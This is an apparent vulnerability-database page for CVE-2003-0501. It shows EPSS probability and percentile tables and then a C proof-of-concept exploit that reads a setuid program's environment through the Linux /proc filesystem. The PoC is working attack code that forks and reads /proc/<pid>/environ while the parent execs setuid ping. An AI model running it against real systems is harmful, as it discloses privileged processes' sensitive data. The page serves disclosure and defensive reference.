CVE-2003-0501 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	2.05%	–	–
2022-02-13	–	–	2.05%	–	–
2022-04-03	–	–	2.05%	–	–
2022-08-28	–	–	2.05%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.21%
2025-03-30	–	–	–	–	0.22%
2025-04-15	–	–	–	–	0.22%
2025-04-15	–	–	–	–	0.22,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	56%
2022-02-13	57%
2022-04-03	78%
2022-08-28	79%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	41%
2025-03-30	42%
2025-04-15	45%
2025-04-15	45%

/* source: https://www.securityfocus.com/bid/8002/info A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information. */ /**************************************************************** * * * Linux /proc information disclosure PoC * * by IhaQueR * * * ****************************************************************/ #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <signal.h> #include <sys/types.h> #include <sys/mman.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> static char buf[128]; void fatal(const char *msg) { printf("\n"); if (!errno) { fprintf(stderr, "FATAL: %s\n", msg); } else { perror(msg); } printf("\n"); fflush(stdout); fflush(stderr); exit(129); } int main() { int fd, r; char c; sprintf(buf, "/proc/%d/environ", getpid()); fd = open(buf, O_RDONLY); if (fd > 0) { sprintf(buf, "/proc/%d", getpid()); if (fork()) { printf("\nparent executing setuid\n"); fflush(stdout); execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL); fatal("execl"); } else { sleep(1); printf("\nchild reads parent's proc:\n"); fflush(stdout); while (1) { r = read(fd, &c, 1); if (r <= 0) break; printf("%c", c); } printf("\n\nContent of %s\n", buf); fflush(stdout); execl("/bin/ls", "ls", "-l", buf, NULL); } } else fatal("open proc"); printf("\n"); fflush(stdout); return 0; }